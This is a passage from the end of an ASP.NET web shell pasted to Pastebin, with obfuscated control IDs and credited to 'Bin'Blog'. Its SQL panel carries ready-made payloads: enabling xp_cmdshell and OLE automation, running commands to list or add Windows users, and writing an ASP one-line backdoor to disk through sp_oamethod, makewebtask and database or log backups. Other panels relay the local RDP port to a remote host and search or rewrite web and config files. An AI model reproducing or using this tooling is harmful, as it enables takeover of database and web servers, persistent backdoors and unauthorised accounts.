  2534. <p>ConnString : <asp:TextBox id="MasR" style="width:70%;margin:0 8px;" CssClass="input" runat="server"/><asp:DropDownList runat="server" CssClass="list" ID="WYmo" AutoPostBack="True" OnSelectedIndexChanged="zOVO" ><asp:ListItem></asp:ListItem><asp:ListItem Value="server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB">MSSQL</asp:ListItem><asp:ListItem Value="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=E:\database.mdb">ACCESS</asp:ListItem></asp:DropDownList><asp:Button ID="QcZPA" runat="server" Text="Go" CssClass="bt" OnClick="BGY"/></p>
  2535. <div id="dQIIF" runat="server">
  2536. <div id="irTU" runat="server"></div>
  2537. <div id="uXevN" runat="server">
  2538. Please select a database : <asp:DropDownList runat="server" ID="Pvf" AutoPostBack="True" OnSelectedIndexChanged="zOVO" CssClass="list"></asp:DropDownList>
  2539. SQLExec : <asp:DropDownList runat="server" ID="FGEy" AutoPostBack="True" OnSelectedIndexChanged="zOVO" CssClass="list"><asp:ListItem Value="">-- SQL Server Exec --</asp:ListItem><asp:ListItem Value="Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')">Add xp_cmdshell</asp:ListItem><asp:ListItem Value="Use master dbcc addextendedproc('sp_OACreate','odsole70.dll')">Add sp_oacreate</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;">Add xp_cmdshell(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;">Add sp_oacreate(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Web Assistant Procedures',1;RECONFIGURE;">Add makewebtask(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;">Add openrowset/opendatasource(SQL2005)</asp:ListItem><asp:ListItem Value="Exec master.dbo.xp_cmdshell 'net user'">XP_cmdshell exec</asp:ListItem><asp:ListItem Value="EXEC MASTER..XP_dirtree 'c:\',1,1">XP_dirtree</asp:ListItem><asp:ListItem Value="Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^&lt;%execute(request(char(35)))%^>>c:\bin.asp';">SP_oamethod exec</asp:ListItem><asp:ListItem Value="sp_makewebtask @outputfile='c:\bin.asp',@charset=gb2312,@query='select ''&lt;%execute(request(chr(35)))%&gt;'''">SP_makewebtask make file</asp:ListItem><asp:ListItem Value="exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell(&#34;cmd.exe /c net user root root/add &#34;)')">SandBox</asp:ListItem><asp:ListItem Value="create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup log @a to disk=@s;insert into [bin_cmd](cmd)values('&lt;%execute(request(chr(35)))%&gt;');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='e:\1.asp' backup log @b to disk=@t with init,no_truncate;drop table [bin_cmd];">LogBackup</asp:ListItem><asp:ListItem Value="create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup database @a to disk=@s;insert into [bin_cmd](cmd)values('&lt;%execute(request(chr(35)))%&gt;');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='c:\bin.asp' backup database @b to disk=@t WITH DIFFERENTIAL,FORMAT;drop table [bin_cmd];">DatabaseBackup</asp:ListItem></asp:DropDownList>
  2540. </div>
  2541. <table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td> Run SQL </td></tr><tr><td><textarea id="jHIy" class="area" style="width:600px;height:60px;overflow:auto;" runat="server" rows="6" cols="1"></textarea></td></tr><tr><td>
  2542. <asp:Button runat="server" ID="WOhJ" CssClass="bt" Text="Query" onclick="ORUgV"/></td></tr></table>
  2543. <div style="overflow-x:auto;width:950px" >
  2544. <p>
  2545. <asp:DataGrid runat="server" ID="rom" HeaderStyle-CssClass="head" BorderWidth="0" GridLines="None" ></asp:DataGrid>
  2546. </p>
  2547. </div>
  2548. </div>
  2549. </div>
  2550. <%--PortMap--%>
  2551. <div id="hOWTm" runat="server">
  2552. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  2553. <tr align="center">
  2554. <td style="width:5%"></td>
  2555. <td style="width:20%" align="left">Local Ip : <input class="input" runat="server" id="eEpm" type="text" size="20" value="127.0.0.1"/></td>
  2556. <td style="width:20%" align="left">Local Port : <input class="input" runat="server" id="iXdh" type="text" size="20" value="3389"/></td>
  2557. <td style="width:20%" align="left">Remote Ip : <input class="input" runat="server" id="llH" type="text" size="20" value="www.rootkit.net.cn"/></td>
  2558. <td style="width:20%" align="left">Remote Port : <input class="input" runat="server" id="ZHS" type="text" size="20" value="80"/></td></tr>
  2559. <tr align="center"><td colspan="5"><br/><asp:Button ID="FJE" CssClass="bt" runat="server" Text="MapPort" OnClick="wDZ"/> <asp:Button ID="giX" CssClass="bt" runat="server" Text="ClearAll" OnClick="vJNsE"/> <asp:Button ID="GFsm" CssClass="bt" runat="server" Text="Refresh" OnClick="tYoZ"/></td></tr></table></div>
  2560. <%--Search--%>
  2561. <div id="yhv" runat="server">
  2562. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
  2563. <tr align="center">
  2564. <td style="width:20%" align="left">Keyword</td>
  2565. <td style="width:60%" align="left"><textarea id="iaMKl" runat="server" class="area" style="width:100%" rows="4"></textarea></td>
  2566. <td style="width:20%" align="left"><input type="checkbox" runat="server" id="rAQ" value="1"/> Use Regex</td>
  2567. </tr>
  2568. <tr align="center">
  2569. <td style="width:20%" align="left">Replace As</td>
  2570. <td style="width:60%" align="left"><textarea id="qPe" runat="server" class="area" style="width:100%" rows="4"></textarea></td>
  2571. <td style="width:20%" align="left"><input type="checkbox" runat="server" id="YZw"/> Replace</td>
  2572. </tr>
  2573. <tr align="center">
  2574. <td style="width:20%" align="left">Search FileType</td>
  2575. <td style="width:60%" align="left"><input type="text" runat="server" class="input" id="UDLvA" style="width:100%" value="asp|asa|cer|cdx|aspx|asax|ascx|cs|jsp|php|txt|inc|ini|js|htm|html|xml|config"/></td>
  2576. <td style="width:20%" align="left"><asp:DropDownList runat="server" ID="Ven" AutoPostBack="False" CssClass="list"><asp:ListItem Value="name">File Name</asp:ListItem><asp:ListItem Value="content" Selected="True">File Content</asp:ListItem></asp:DropDownList></td>
  2577. </tr>
  2578. <tr align="center">
  2579. <td style="width:20%" align="left">Path</td>
  2580. <td style="width:60%" align="left"><input type="text" class="input" id="NaLJ" runat="server" style="width:100%" /></td>
  2581. <td style="width:20%" align="left"><asp:Button CssClass="bt" id="axy" runat="server" onclick="NBy" Text="Start" /></td>
  2582. </tr>
  2583. </table>
  2584. <br/>
  2585. <br/>
  2586. <asp:Table ID="oJiym" runat="server" Width="100%" CellSpacing="0" >
  2587. <asp:TableRow CssClass="head"><asp:TableCell Width="60%">File Path</asp:TableCell><asp:TableCell Width="20%">Last modified</asp:TableCell><asp:TableCell Width="20%">Size</asp:TableCell></asp:TableRow>
  2588. </asp:Table>
  2589. </div>
  2590. </td></tr></table>
  2591. <div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">Copyright &copy; 2006-2009 <a href="http://www.rootkit.net.cn" target="_blank">Bin'Blog</a> All Rights Reserved.</div></div>
  2592. </form>
  2593. </body>
  2594. </html>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top